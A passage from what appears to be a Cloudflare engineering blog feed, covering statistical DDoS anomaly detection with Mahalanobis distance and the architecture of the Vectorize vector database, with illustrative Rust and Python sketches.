          </figure><p>To use our z-score analogy from before, we’d want our points to be spherical, since our multidimensional z-score is then just the distance from the centre of the cloud. We could then use this distance to define a cutoff threshold for attacks.</p><p>For several reasons, a perfect sphere is unlikely in practice. Our various features measure different things, so they have very different scales of ‘normal’. One property might vary between 100-300 whereas another property might usually occupy the interval 0-1. A change of 3 in this latter property would be a significant anomaly, whereas in the first this would just be within the normal range.</p><p>More subtly, two or more axes may be correlated, so an increase in one is usually mirrored with a proportional increase/decrease in another dimension. This turns our sphere into an off-axis disc shape, as pictured above.</p><p>Fortunately, we have a couple of mathematical tricks up our sleeve. The first is scale normalization. In each of our n dimensions, we subtract the mean, and divide by the standard deviation. This makes all our dimensions the same size and centres them around zero. This gives a multidimensional analogue of z-score, but it won’t fix the disc shape.</p><p>What we can do is figure out the orientation and dimensions of the disc, and for this we use a tool called <a href="https://en.wikipedia.org/wiki/Principal_component_analysis"><u>Principal Component Analysis (PCA)</u></a>. This lets us reorient our disc, and rescale the axes according to their size, to make them all the same.</p><p>Imagine grabbing the disc out of the air, then drawing new X and Y axes on the top surface, with the origin at the centre of the disc. Our new Z-axis is the thickness of the disc. We can compare the thickness to the diameter of the disc, to give us a scaling factor for the Z direction. 
Imagine stretching the disc along the z-axis until it’s as tall as the length across the diameter.</p><p>In reality there’s nothing to say that X &amp; Y have to be the same size either, but hopefully you get the general idea. PCA lets us draw new axes along these lines of correlation in an arbitrary number of dimensions, and convert our n-dimensional disc into a nicely behaved sphere of points (technically an n-dimensional sphere).</p><p>Having done all this work, we can uniquely define a coordinate transformation which takes any measurement from our raw features, and tells us where it should lie in the sphere, and since all our dimensions are the same size we can generate an anomaly score purely based on its distance from the centre of the cloud.</p><p>As a final trick, we can also use a final scaling operation to ensure the sphere for dataset A is the same size as the sphere generated from dataset B, meaning we can do this same process for any traffic data and define a cutoff distance λ which is the same across all our models. Rather than fine-tuning models for each individual customer zone, we can tune this to a value which applies globally.</p><p>Another name for this measurement is <a href="https://en.wikipedia.org/wiki/Mahalanobis_distance"><u>Mahalanobis distance</u></a>. (Inclined readers can understand this equivalence by considering the role of the covariance matrix in PCA and Mahalanobis distance. Further discussion can be found on <a href="https://stats.stackexchange.com/questions/166525/is-mahalanobis-distance-equivalent-to-the-euclidean-one-on-the-pca-rotated-data"><u>this</u></a> StackExchange post.) We further tune the process to discard dimensions with little variance — if our disc is too thin we discard the thickness dimension.  In practice, such dimensions were too sensitive to be useful.</p>
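<p>To make this concrete, here is a toy two-dimensional sketch (illustrative code only; the real pipeline works in roughly a dozen dimensions using the PCA machinery described above): computing the Mahalanobis distance amounts to inverting the covariance matrix, after which classification is a single comparison against the global cutoff λ.</p>

```rust
// Toy sketch: Mahalanobis distance in 2 dimensions, with the covariance
// matrix inverted by hand. Equivalent to Euclidean distance after the
// normalization and PCA re-scaling described in the text.
fn mahalanobis_2d(x: [f64; 2], mu: [f64; 2], cov: [[f64; 2]; 2]) -> f64 {
    // Invert the 2x2 covariance matrix: inv = adj(cov) / det(cov).
    let det = cov[0][0] * cov[1][1] - cov[0][1] * cov[1][0];
    let inv = [
        [cov[1][1] / det, -cov[0][1] / det],
        [-cov[1][0] / det, cov[0][0] / det],
    ];
    // sqrt(d^T * inv * d), where d is the offset from the mean.
    let d = [x[0] - mu[0], x[1] - mu[1]];
    (d[0] * (inv[0][0] * d[0] + inv[0][1] * d[1])
        + d[1] * (inv[1][0] * d[0] + inv[1][1] * d[1]))
        .sqrt()
}

/// With a single global cutoff, classification is one comparison.
fn is_anomalous(distance: f64, lambda: f64) -> bool {
    distance > lambda
}
```

<p>With an identity covariance matrix this reduces to plain Euclidean distance, which is exactly the spherical case the transformations above are designed to reach.</p>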
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1OcPc7zoehsizwzPEkD1Fc/094bd59ca6d6aba3c301fd74f12d580a/image5.png" />
          </figure><p>We’re left with a multidimensional analogue of the z-score we started with, but this time our variables aren’t correlated with peacetime traffic volume. Above we show 2 output dimensions, with coloured circles which show Mahalanobis distances of 4, 5 and 6. Anything outside the green circle will be classified as an attack.</p>
    <div>
      <h2>How we train ~1 million models daily to keep customers safe</h2>
      <a href="#how-we-train-1-million-models-daily-to-keep-customers-safe">
        
      </a>
    </div>
    <p>The approach we’ve outlined is incredibly parallelizable: a single model requires only the traffic data for that one website, and the datasets needed can be quite small. We use 4 weeks of training data chunked into 5-minute intervals, which is only ~8k rows/website.</p><p>We run all our training and inference in an Apache Airflow deployment in Kubernetes. Due to the parallelizability, we can scale horizontally as needed. On average, we can train about 3 models/second/thread. We currently retrain models every day, but we’ve observed very little intraday model drift (i.e. yesterday’s model is the same as today’s), so training frequency may be reduced in the future.</p><p>We don’t consider it necessary to build models for all our customers; instead, we train models for a large sample of representative customers, including a large number on the Free plan. The goal is to identify attacks for further study, which we then use to tune our existing DDoS systems for all customers.</p>
    <div>
      <h2>Join us!</h2>
      <a href="#join-us">
        
      </a>
    </div>
    <p>If you’ve read this far you may have questions, like “how do you filter attacks from your training data?” or you may have spotted a handful of other technical details which I’ve elided to keep this post accessible to a general audience. If so, you would fit in well here at Cloudflare. We’re helping to build a better Internet, and we’re <a href="https://www.cloudflare.com/careers/jobs/?title=data+scientist"><u>hiring</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[DDoS]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <guid isPermaLink="false">4awe2vvz8flXFLuz3BGm7j</guid>
            <dc:creator>Nick Wood</dc:creator>
            <dc:creator>Manish Arora</dc:creator>
        </item>
        <item>
            <title><![CDATA[Building Vectorize, a distributed vector database, on Cloudflare’s Developer Platform]]></title>
            <link>https://blog.cloudflare.com/building-vectorize-a-distributed-vector-database-on-cloudflare-developer-platform/</link>
            <pubDate>Tue, 22 Oct 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare's Vectorize is now generally available, offering faster responses, lower pricing, a free tier, and supporting up to 5 million vectors. ]]></description>
            <content:encoded><![CDATA[ <p><a href="https://developers.cloudflare.com/vectorize/"><u>Vectorize</u></a> is a globally distributed vector database that enables you to build full-stack, AI-powered applications with Cloudflare Workers. Vectorize makes querying embeddings — representations of values or objects like text, images, audio that are designed to be consumed by machine learning models and semantic search algorithms — faster, easier and more affordable.</p><p>In this post, we dive deep into how we built Vectorize on <a href="https://developers.cloudflare.com/"><u>Cloudflare’s Developer Platform</u></a>, leveraging Cloudflare’s <a href="https://www.cloudflare.com/network/"><u>global network</u></a>, <a href="https://developers.cloudflare.com/cache"><u>Cache</u></a>, <a href="https://developers.cloudflare.com/workers/"><u>Workers</u></a>, <a href="https://developers.cloudflare.com/r2/"><u>R2</u></a>, <a href="https://developers.cloudflare.com/queues/"><u>Queues</u></a>, <a href="https://developers.cloudflare.com/durable-objects"><u>Durable Objects</u></a>, and <a href="https://blog.cloudflare.com/container-platform-preview/"><u>container platform</u></a>.</p>
    <div>
      <h2>What is a vector database?</h2>
      <a href="#what-is-a-vector-database">
        
      </a>
    </div>
    <p>A <a href="https://www.cloudflare.com/learning/ai/what-is-vector-database/"><u>vector database</u></a> is a queryable store of vectors. A vector is a large array of numbers, each of which is called a vector dimension.</p><p>A vector database has a <a href="https://en.wikipedia.org/wiki/Similarity_search"><u>similarity search</u></a> query: given an input vector, it returns the vectors that are closest according to a specified metric, potentially filtered on their metadata.</p><p><a href="https://blog.cloudflare.com/vectorize-vector-database-open-beta/#why-do-i-need-a-vector-database"><u>Vector databases are used</u></a> to power semantic search, document classification, recommendation, and anomaly detection, as well as contextualizing answers generated by LLMs (<a href="https://www.cloudflare.com/learning/ai/retrieval-augmented-generation-rag/"><u>Retrieval Augmented Generation, RAG</u></a>).</p>
    <div>
      <h3>Why do vectors require special database support?</h3>
      <a href="#why-do-vectors-require-special-database-support">
        
      </a>
    </div>
    <p>Conventional data structures like <a href="https://en.wikipedia.org/wiki/B-tree"><u>B-trees</u></a>, or <a href="https://en.wikipedia.org/wiki/Binary_search_tree"><u>binary search trees</u></a> expect the data they index to be cheap to compare and to follow a one-dimensional linear ordering. They leverage this property of the data to organize it in a way that makes search efficient. Strings, numbers, and booleans are examples of data featuring this property.</p><p>Because vectors are high-dimensional, ordering them in a one-dimensional linear fashion is ineffective for similarity search, as the resulting ordering doesn’t capture the proximity of vectors in the high-dimensional space. This phenomenon is often referred to as the <a href="https://en.wikipedia.org/wiki/Curse_of_dimensionality"><u>curse of dimensionality</u></a>.</p><p>In addition to this, comparing two vectors using distance metrics useful for similarity search is a computationally expensive operation, requiring vector-specific techniques for databases to overcome.</p>
    <div>
      <h2>Query processing architecture</h2>
      <a href="#query-processing-architecture">
        
      </a>
    </div>
    <p>Vectorize builds upon Cloudflare’s global network to bring fast vector search close to its users, and relies on many components to do so.</p><p>These are the Vectorize components involved in processing vector queries.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3iEISPtYCjwmggsjjQ4i14/dddac58c03a875ca258456b25f75df38/blog-2590-vectorize-01-query-read.png" />
          </figure><p>Vectorize runs in every <a href="https://www.cloudflare.com/network/"><u>Cloudflare data center</u></a>, on the infrastructure powering Cloudflare Workers. It serves traffic coming from <a href="https://developers.cloudflare.com/workers/runtime-apis/bindings/"><u>Worker bindings</u></a> as well as from the <a href="https://developers.cloudflare.com/api/operations/vectorize-list-vectorize-indexes"><u>Cloudflare REST API</u></a> through our API Gateway.</p><p>Each query is processed on a server in the data center in which it enters, picked in a fashion that spreads the load across all servers of that data center.</p><p>The Vectorize DB Service (a Rust binary) running on that server processes the query by reading the data for that index on <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>R2</u></a>, Cloudflare’s object storage. It does so by reading through <a href="https://developers.cloudflare.com/cache"><u>Cloudflare’s Cache</u></a> to speed up I/O operations.</p>
    <div>
      <h2>Searching vectors, and indexing them to speed things up</h2>
      <a href="#searching-vectors-and-indexing-them-to-speed-things-up">
        
      </a>
    </div>
    <p>Being a vector database, Vectorize features a similarity search query: given an input vector, it returns the K vectors that are closest according to a specified metric.</p><p>Conceptually, this similarity search consists of 3 steps:</p><ol><li><p>Evaluate the proximity of the query vector with every vector present in the index.</p></li><li><p>Sort the vectors based on their proximity “score”.</p></li><li><p>Return the top matches.</p></li></ol><p>While this method is accurate and effective, it is computationally expensive and does not scale well to indexes containing millions of vectors (see <b>Why do vectors require special database support?</b> above).</p><p>To do better, we need to prune the search space, that is, avoid scanning the entire index for every query.</p><p>For this to work, we need to find a way to discard vectors we know are irrelevant for a query, while focusing our efforts on those that might be relevant.</p>
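<p>The three steps above fit in a few lines. This is the naive exhaustive version (an illustration, not Vectorize's implementation), here using cosine similarity as the metric:</p>

```rust
// Naive exhaustive similarity search: score, sort, take the top K.
fn cosine(a: &[f32], b: &[f32]) -> f32 {
    let dot: f32 = a.iter().zip(b).map(|(x, y)| x * y).sum();
    let na = a.iter().map(|x| x * x).sum::<f32>().sqrt();
    let nb = b.iter().map(|x| x * x).sum::<f32>().sqrt();
    dot / (na * nb)
}

/// Returns the indices of the k index vectors closest to `query`.
fn top_k(index: &[Vec<f32>], query: &[f32], k: usize) -> Vec<usize> {
    // 1. Evaluate the proximity of the query with every vector.
    let mut scored: Vec<(usize, f32)> = index
        .iter()
        .enumerate()
        .map(|(i, v)| (i, cosine(v, query)))
        .collect();
    // 2. Sort by proximity score, best match first.
    scored.sort_by(|a, b| b.1.partial_cmp(&a.1).unwrap());
    // 3. Return the top matches.
    scored.into_iter().take(k).map(|(i, _)| i).collect()
}
```

<p>Every query touches every vector in the index, which is exactly the full scan that pruning the search space avoids.</p>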
    <div>
      <h3>Indexing vectors with IVF</h3>
      <a href="#indexing-vectors-with-ivf">
        
      </a>
    </div>
    <p>Vectorize prunes the search space for a query using an indexing technique called <a href="https://blog.dailydoseofds.com/p/approximate-nearest-neighbor-search"><u>IVF, Inverted File Index</u></a>.</p><p>IVF clusters the index vectors according to their relative proximity. For each cluster, it then identifies its centroid, the center of gravity of that cluster: a high-dimensional point minimizing the distance to every vector in the cluster.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1q48ixmjKRsTkBdTR6SbSR/1c0ba3c188a78150e74ef3baf849ae7e/blog-2590-vectorize-02-ivf-index.png" />
          </figure><p>Once the list of centroids is determined, each centroid is given a number. We then structure the data on storage by placing each vector in a file named after the centroid it is closest to.</p><p>When processing a query, we can then focus on relevant vectors by looking only in the centroid files closest to that query vector, effectively pruning the search space.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3BjkRvCyT4fEgVqIHGkwQg/d692e167dc34fe5b09e94a5ebb29fe28/image8.png" />
          </figure>
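<p>A toy sketch of the bucketing just described (illustrative code, not Vectorize's implementation): every vector is filed under its nearest centroid, and a query later scans only the files of the centroids closest to it.</p>

```rust
// Toy IVF build step: bucket each vector into its nearest centroid's file.
fn sq_dist(a: &[f32], b: &[f32]) -> f32 {
    a.iter().zip(b).map(|(x, y)| (x - y).powi(2)).sum()
}

/// Returns the id of the centroid nearest to `v`.
fn assign(centroids: &[Vec<f32>], v: &[f32]) -> usize {
    let mut best = 0;
    let mut best_d = f32::INFINITY;
    for (i, c) in centroids.iter().enumerate() {
        let d = sq_dist(c, v);
        if d < best_d {
            best = i;
            best_d = d;
        }
    }
    best
}

/// Groups every index vector id under its centroid's "file".
fn build_ivf(centroids: &[Vec<f32>], vectors: &[Vec<f32>]) -> Vec<Vec<usize>> {
    let mut files: Vec<Vec<usize>> = vec![Vec::new(); centroids.len()];
    for (i, v) in vectors.iter().enumerate() {
        files[assign(centroids, v)].push(i);
    }
    files
}
```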
    <div>
      <h3>Compressing vectors with PQ</h3>
      <a href="#compressing-vectors-with-pq">
        
      </a>
    </div>
    <p>Vectorize supports vectors of up to 1536 dimensions. At 4 bytes per dimension (32-bit float), this means up to 6 KB per vector. That’s 6 GB of uncompressed vector data per million vectors that we need to fetch from storage and put in memory.</p><p>To process multi-million vector indexes while limiting the CPU, memory, and I/O required to do so, Vectorize uses a <a href="https://en.wikipedia.org/wiki/Dimensionality_reduction"><u>dimensionality reduction</u></a> technique called <a href="https://en.wikipedia.org/wiki/Vector_quantization"><u>PQ (Product Quantization)</u></a>. PQ compresses the vector data in a way that retains most of its specificity while greatly reducing its size — a bit like downsampling a picture to reduce the file size, while still being able to tell precisely what’s in the picture — enabling Vectorize to efficiently perform similarity search on these lighter vectors.</p><p>In addition to storing the compressed vectors, their original data is retained on storage as well, and can be requested through the API; the compressed vector data is used only to speed up the search.</p>
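<p>In miniature (an illustrative sketch; the codebook sizes and splits here are ours, not Vectorize's actual parameters), PQ encoding splits each vector into sub-vectors and stores one small codebook id per sub-vector:</p>

```rust
// Toy PQ encoder: replace each sub-vector with the id of its nearest
// codebook centroid, shrinking several floats to a single byte.
fn nearest(codebook: &[Vec<f32>], sub: &[f32]) -> u8 {
    let mut best = 0u8;
    let mut best_d = f32::INFINITY;
    for (i, c) in codebook.iter().enumerate() {
        let d: f32 = c.iter().zip(sub).map(|(a, b)| (a - b).powi(2)).sum();
        if d < best_d {
            best = i as u8;
            best_d = d;
        }
    }
    best
}

/// Encodes `v` as one codebook id per sub-vector of length `sub_len`,
/// using a separate codebook per sub-vector position.
fn pq_encode(v: &[f32], codebooks: &[Vec<Vec<f32>>], sub_len: usize) -> Vec<u8> {
    v.chunks(sub_len)
        .zip(codebooks)
        .map(|(sub, cb)| nearest(cb, sub))
        .collect()
}
```

<p>With 256-entry codebooks, each sub-vector of floats collapses to a single byte, which is where the large storage and I/O savings come from.</p>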
    <div>
      <h3>Approximate nearest neighbor search and result accuracy refining</h3>
      <a href="#approximate-nearest-neighbor-search-and-result-accuracy-refining">
        
      </a>
    </div>
    <p>By pruning the search space and compressing the vector data, we’ve managed to increase the efficiency of our query operation, but it is now possible to produce a set of matches that is different from the set of true closest matches. We have traded result accuracy for speed by performing an <a href="https://en.wikipedia.org/wiki/Nearest_neighbor_search#Approximation_methods"><u>approximate nearest neighbor search</u></a>, reaching an accuracy of ~80%.</p><p>To boost the <a href="https://blog.cloudflare.com/workers-ai-bigger-better-faster/#how-fast-is-vectorize"><u>result accuracy up to over 95%</u></a>, Vectorize then <a href="https://developers.cloudflare.com/vectorize/best-practices/query-vectors/#control-over-scoring-precision-and-query-accuracy"><u>performs a result refinement pass</u></a> on the top approximate matches using uncompressed vector data, and returns the best refined matches.</p>
    <div>
      <h2>Eventual consistency and snapshot versioning</h2>
      <a href="#eventual-consistency-and-snapshot-versioning">
        
      </a>
    </div>
    <p>Whenever you query your Vectorize index, you are guaranteed to receive results which are read from a consistent, immutable snapshot — even as you write to your index concurrently. Writes are applied in strict order of their arrival in our system, and they are funneled into an asynchronous process. We update the index files by reading the old version, making changes, and writing this updated version as a new object in R2. Each index file has its own version number, and can be updated independently of the others. Between two versions of the index we may update hundreds or even thousands of IVF and metadata index files, but even as we update the files, your queries will consistently use the current version until it is time to switch.</p><p>Each IVF and metadata index file has its own version. The list of all versioned files which make up the snapshotted version of the index is contained within a <i>manifest file</i>. Each version of the index has its own manifest. When we write a new manifest file based on the previous version, we only need to update references to the index files which were modified; if there are files which weren't modified, we simply keep the references to the previous version.</p><p>We use a <i>root manifest</i> as the authority of the current version of the index. This is the pivot point for changes. The root manifest is a copy of a manifest file from a particular version, which is written to a deterministic location (the root of the R2 bucket for the index). When our async write process has finished processing vectors, and has written all new index files to R2, we <i>commit</i> by overwriting the current root manifest with a copy of the new manifest. PUT operations in R2 are atomic, so this effectively makes our updates atomic. 
Once the manifest is updated, Vectorize DB Service instances running on our network will pick it up, and use it to serve reads.</p><p>Because we keep past versions of index and manifest files, we effectively maintain versioned snapshots of your index. This means we have a straightforward path towards building a point-in-time recovery feature (similar to <a href="https://developers.cloudflare.com/d1/reference/time-travel/"><u>D1's Time Travel feature</u></a>).</p><p>Because our write process is asynchronous, Vectorize is <i>eventually consistent</i> — that is, there is a delay between the successful completion of a write request and seeing those updates reflected in queries. This isn't ideal for every data storage use case. For example, imagine two users of an online airline ticket reservation application who both buy the same seat — one user will successfully reserve the ticket, and the other will eventually get an error saying the seat was taken, and they need to choose again. Because a vector index is not typically used as a primary database for these transactional use cases, we decided eventual consistency was a worthy trade-off in order to ensure Vectorize queries would be fast, high-throughput, and cheap even as the size of indexes grew into the millions.</p>
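<p>A minimal model of the manifest scheme, using a dict as a stand-in for R2 (where a PUT of the root manifest key is atomic); the key layout is an illustrative assumption:</p>

```python
# Versioned index files plus an atomic "root manifest" swap (illustrative).
storage = {}   # stands in for the R2 bucket

def write_index_file(name, version, data):
    key = f"index/{name}/v{version}"
    storage[key] = data
    return key

def commit(new_manifest):
    # Copying the manifest to the fixed root key is the single pivot point:
    # readers either see the old version or the new one, never a mix.
    storage["root-manifest"] = dict(new_manifest)

# Version 1: two index files.
m1 = {"ivf-0": write_index_file("ivf-0", 1, "centroids v1"),
      "meta-0": write_index_file("meta-0", 1, "metadata v1")}
commit(m1)

# Version 2 updates only ivf-0; meta-0 keeps its reference to v1.
m2 = dict(m1)
m2["ivf-0"] = write_index_file("ivf-0", 2, "centroids v2")
commit(m2)

root = storage["root-manifest"]
print(root)   # ivf-0 points at v2, meta-0 still at v1
```

<p>Past versions remain in storage untouched, which is what makes each snapshot immutable and a point-in-time recovery feature feasible.</p>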
    <div>
      <h2>Coordinating distributed writes: it's just another block in the WAL</h2>
      <a href="#coordinating-distributed-writes-its-just-another-block-in-the-wal">
        
      </a>
    </div>
    <p>In the section above, we touched on our eventually consistent, asynchronous write process. Now we'll dive deeper into our implementation. </p>
    <div>
      <h3>The WAL</h3>
      <a href="#the-wal">
        
      </a>
    </div>
    <p>A <a href="https://en.wikipedia.org/wiki/Write-ahead_logging"><u>write ahead log</u></a> (WAL) is a common technique for making atomic and durable writes in a database system. Vectorize’s WAL is implemented with <a href="https://blog.cloudflare.com/sqlite-in-durable-objects/"><u>SQLite in Durable Objects</u></a>.</p><p>In Vectorize, the payload for each update is given an ID, written to R2, and the ID for that payload is handed to the WAL Durable Object which persists it as a "block." Because it's just a pointer to the data, the blocks are lightweight records of each mutation.</p><p>Durable Objects (DO) have many benefits — strong transactional guarantees, a novel combination of compute and storage, and a high degree of horizontal scale — but individual DOs are small allotments of memory and compute. However, the process of updating the index for even a single mutation is resource intensive — a single write may include thousands of vectors, which may mean reading and writing thousands of data files stored in R2, and storing a lot of data in memory. This is more than what a single DO can handle.</p><p>So we designed the WAL to leverage DO's strengths and made it a coordinator. It controls the steps of updating the index by delegating the heavy lifting to beefier instances of compute resources (which we call "Executors"), but uses its transactional properties to ensure the steps are done with strong consistency. It safeguards the process from rogue or stalled executors, and ensures the WAL processing continues to move forward. DOs are easy to scale, so we create a new DO instance for each Vectorize index.</p>
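<p>The block-as-pointer idea can be sketched like this; the in-memory structures stand in for R2 and the WAL’s SQLite table, and all field names are illustrative assumptions:</p>

```python
# WAL blocks as lightweight pointers: the heavy payload goes to object
# storage, the WAL records only an ID and some bookkeeping (illustrative).
import uuid

object_storage = {}   # stands in for R2
wal_blocks = []       # stands in for the WAL's SQLite table

def append_write(vectors):
    payload_id = str(uuid.uuid4())
    object_storage[payload_id] = vectors          # heavy payload lives in R2
    block = {"seq": len(wal_blocks),              # strict arrival order
             "payload_id": payload_id,            # pointer to the data
             "n_vectors": len(vectors)}
    wal_blocks.append(block)
    return block

append_write([[0.1, 0.2], [0.3, 0.4]])
append_write([[0.5, 0.6]])
print(wal_blocks)
```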
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7l5hw2yVkyGKpU8xTMyX8f/743941bd273731bdb3dbf8110afc2526/unnamed.png" />
          </figure>
    <div>
      <h3>WAL Executor</h3>
      <a href="#wal-executor">
        
      </a>
    </div>
    <p>The executors run from a single pool of compute resources, shared by all WALs. We use a simple producer-consumer pattern using <a href="https://developers.cloudflare.com/queues/"><u>Cloudflare Queues</u></a>. The WAL enqueues a request, and executors poll the queue. When they get a request, they call an API on the WAL requesting to be <i>assigned</i> to it.</p><p>The WAL ensures that one and only one executor is ever assigned to that write. As the executor writes, the index files and the updated manifest are written in R2, but they are not yet visible. The final step is for the executor to call another API on the WAL to <i>commit</i> the change — and this is key — it passes along the updated manifest. The WAL is responsible for overwriting the root manifest with the updated manifest. The root manifest is the pivot point for atomic updates: once written, the change is made visible to Vectorize’s database service, and the updated data will appear in queries.</p><p>From the start, we designed this process to account for non-deterministic errors. We focused on enumerating failure modes first, and only moving forward with possible design options after asserting they handled the possibilities for failure. For example, if an executor stalls, the WAL finds a new executor. If the first executor comes back, the coordinator will reject its attempt to commit the update. Even if that first executor is working on an old version which has already been written, and writes new index files and a new manifest to R2, it will not overwrite the files written from the committed version.</p>
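<p>A sketch of the assignment and commit guard, assuming a single in-flight batch; the class and method names are illustrative, not the real API:</p>

```python
# Single-assignment WAL coordinator sketch: exactly one executor may commit,
# and a stalled-then-revived executor's commit is rejected (illustrative).
class Wal:
    def __init__(self):
        self.assigned = None      # executor currently assigned to the batch
        self.committed = False

    def assign(self, executor_id):
        # Reassignment only happens when the WAL decides the executor stalled.
        self.assigned = executor_id

    def commit(self, executor_id, manifest):
        if self.committed or executor_id != self.assigned:
            return False          # stale or unknown executor: rejected
        self.root_manifest = manifest
        self.committed = True
        return True

wal = Wal()
wal.assign("exec-1")
wal.assign("exec-2")                     # exec-1 presumed stalled; WAL moves on
print(wal.commit("exec-1", {"v": 1}))    # rejected: no longer assigned
print(wal.commit("exec-2", {"v": 2}))    # accepted: becomes the root manifest
```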
    <div>
      <h3>Batching updates</h3>
      <a href="#batching-updates">
        
      </a>
    </div>
    <p>Now that we have discussed the general flow, we can circle back to one of our favorite features of the WAL. On the executor, the most time-intensive part of the write process is reading and writing many files from R2. Even with making our reads and writes concurrent to maximize throughput, the cost of updating even thousands of vectors within a single file is dwarfed by the total latency of the network I/O. Therefore it is more efficient to maximize the number of vectors processed in a single execution.</p><p>So that is what we do: we batch discrete updates. When the WAL is ready to request work from an executor, it will get a chunk of "blocks" off the WAL, starting with the next un-written block, and maintaining the sequence of blocks. It will write a new "batch" record into the SQLite table, which ties together that sequence of blocks, the version of the index, and the ID of the executor assigned to the batch.</p><p>Users can batch multiple vectors to update in a single insert or upsert call. Because the size of each update can vary, the WAL adaptively calculates the optimal size of its batch to increase throughput. The WAL will fit as many upserted vectors as possible into a single batch by counting the number of updates represented by each block. It will batch up to 200,000 vectors at once (a value we arrived at after our own testing) with a limit of 1,000 blocks. With this throughput, we have been able to quickly load millions of vectors into an index (with upserts of 5,000 vectors at a time). Also, the WAL does not pause itself to collect more writes to batch — instead, it begins processing a write as soon as it arrives. Because the WAL only processes one batch at a time, this creates a natural pause in its workflow to batch up writes which arrive in the meantime.</p>
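<p>The batching rule can be sketched in Python using the caps mentioned above (200,000 vectors, 1,000 blocks); the helper itself and its handling of an oversized block are illustrative assumptions:</p>

```python
# Adaptive batching sketch: pack consecutive WAL blocks into one batch,
# stopping at the vector cap or the block cap (illustrative).
MAX_VECTORS, MAX_BLOCKS = 200_000, 1_000

def next_batch(blocks, start):
    """Take consecutive blocks from `start`, respecting both caps."""
    taken, vectors = 0, 0
    while (start + taken < len(blocks)
           and taken < MAX_BLOCKS
           and vectors + blocks[start + taken] <= MAX_VECTORS):
        vectors += blocks[start + taken]
        taken += 1
    if taken == 0 and start < len(blocks):   # oversized block: take it alone
        return 1, blocks[start]
    return taken, vectors

# Each entry is the vector count of one WAL block (e.g. a 5,000-vector upsert).
blocks = [5_000] * 50          # 250,000 vectors across 50 blocks
n, v = next_batch(blocks, 0)
print(n, v)   # 40 blocks, 200,000 vectors: the vector cap binds first
```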
    <div>
      <h3>Retraining the index</h3>
      <a href="#retraining-the-index">
        
      </a>
    </div>
    <p>The WAL also coordinates our process for retraining the index. We occasionally re-train indexes to ensure the mapping of IVF centroids best reflects the current vectors in the index. This maintains the high accuracy of the vector search.</p><p>Retraining produces a completely new index. All index files are updated; vectors have been reshuffled across the index space. For this reason, all indexes have a second version stamp — which we call the <i>generation</i> — so that we can differentiate between retrained indexes. </p><p>The WAL tracks the state of the index, and controls when the training is started. We have a second pool of processes called "trainers." The WAL enqueues a request on a queue, then a trainer picks up the request and it begins training.</p><p>Training can take a few minutes to complete, but we do not pause writes on the current generation. The WAL will continue to handle writes as normal. But the training runs from a fixed snapshot of the index, and will become out-of-date as the live index gets updated in parallel. Once the trainer has completed, it signals the WAL, which will then start a multi-step process to switch to the new generation. It enters a mode where it will continue to record writes in the WAL, but will stop making those writes visible on the current index. Then it will begin catching up the retrained index with all of the updates that came in since it started. Once it has caught up to all data present in the index when the trainer signaled the WAL, it will switch over to the newly retrained index. This prevents the new index from appearing to "jump back in time." All subsequent writes will be applied to that new index.</p><p>This is all modeled seamlessly with the batch record. Because it associates the index version with a range of WAL blocks, multiple batches can span the same sequence of blocks as long as they belong to different generations. 
We can say this another way: a single WAL block can be associated with many batches, as long as these batches are in different generations. Conceptually, the batches act as a second WAL layered over the WAL blocks.</p>
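<p>A sketch of how batch records can layer generations over the same block sequence; the field names and generation numbering are illustrative assumptions:</p>

```python
# Batch records tie a range of WAL blocks to an index version *within a
# generation*, so the same blocks can be replayed into a retrained index.
batches = []

def record_batch(generation, first_block, last_block, index_version):
    batches.append({"generation": generation,
                    "blocks": (first_block, last_block),
                    "index_version": index_version})

# Generation 1 processed blocks 0-9 and then 10-14.
record_batch(1, 0, 9, index_version=1)
record_batch(1, 10, 14, index_version=2)

# After retraining, generation 2 replays the same blocks against the new index.
record_batch(2, 0, 14, index_version=1)

# The same starting block appears in batches of two different generations.
same_blocks = [b for b in batches if b["blocks"][0] == 0]
print(same_blocks)
```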
    <div>
      <h2>Indexing and filtering metadata</h2>
      <a href="#indexing-and-filtering-metadata">
        
      </a>
    </div>
    <p>Vectorize supports metadata filters on vector similarity queries. This allows a query to focus the vector similarity search on a subset of the index data, yielding matches that would otherwise not have been part of the top results.</p><p>For instance, this enables us to query for the best matching vectors for <code>color: “blue”</code> and <code>category: “robe”</code>.</p><p>Conceptually, what needs to happen to process this example query is:</p><ul><li><p>Identify the set of vectors matching <code>color: “blue”</code> by scanning all metadata.</p></li><li><p>Identify the set of vectors matching <code>category: “robe”</code> by scanning all metadata.</p></li><li><p>Intersect both sets (boolean AND in the filter) to identify vectors matching both the color and category filter.</p></li><li><p>Score all vectors in the intersected set, and return the top matches.</p></li></ul><p>While this method works, it doesn’t scale well. For an index with millions of vectors, processing the query that way would be very resource intensive. What’s worse, it prevents us from using our IVF index to identify relevant vector data, forcing us to compute a proximity score on potentially millions of vectors if the filtered set of vectors is large.</p><p>To do better, we need to prune the metadata search space by indexing it like we did for the vector data, and find a way to efficiently join the vector sets produced by the metadata index with our IVF vector index.</p>
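<p>The four conceptual steps above, written out naively over toy data (this is the scan-everything approach that Vectorize avoids; distance is squared Euclidean):</p>

```python
# Naive metadata filtering: scan, intersect, then score only the survivors.
vectors = {
    "a": {"vec": [0.0, 0.1], "meta": {"color": "blue", "category": "robe"}},
    "b": {"vec": [0.9, 0.9], "meta": {"color": "blue", "category": "hat"}},
    "c": {"vec": [0.1, 0.0], "meta": {"color": "red",  "category": "robe"}},
    "d": {"vec": [0.2, 0.1], "meta": {"color": "blue", "category": "robe"}},
}

def ids_matching(prop, value):
    return {i for i, r in vectors.items() if r["meta"].get(prop) == value}

query = [0.0, 0.0]
blue  = ids_matching("color", "blue")        # step 1: scan for color
robes = ids_matching("category", "robe")     # step 2: scan for category
both  = blue & robes                         # step 3: intersect (boolean AND)
# Step 4: score only the intersected set and return the best match.
best = min(both, key=lambda i: sum((q - x) ** 2
           for q, x in zip(query, vectors[i]["vec"])))
print(best)
```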
    <div>
